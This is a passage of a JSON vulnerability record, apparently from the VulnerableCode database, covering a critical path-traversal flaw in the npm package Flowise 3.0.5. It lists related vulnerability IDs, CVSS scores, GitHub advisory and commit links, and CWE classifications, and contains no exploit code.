ility":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-8vsg-mxay-gkf7"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-n77p-4nu7-2yb4"},{"vulnerability":"VCID-pg5c-6y4s-h3cq"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wt2v-e5sa-n3g8"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5"}],"references":[{"reference_url":"https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f"},{"reference_url":"https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849"},{"reference_url":"https://github.com/advisories/GHSA-q67q-549q-p849","reference_id":"GHSA-q67q-549q-p849","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q67q-549q-p849"}],"weaknesses":[{"cwe_id":22,"name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","description":"The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."},{"cwe_id":937,"name":"OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013."},{"cwe_id":1035,"name":"OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017."}],"exploits":[],"severity_range_score":"9.0 - 10.0","exploitability":"0.5","weighted_severity":"9.0","risk_score":4.5,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g7y6-euhd-jqhh"}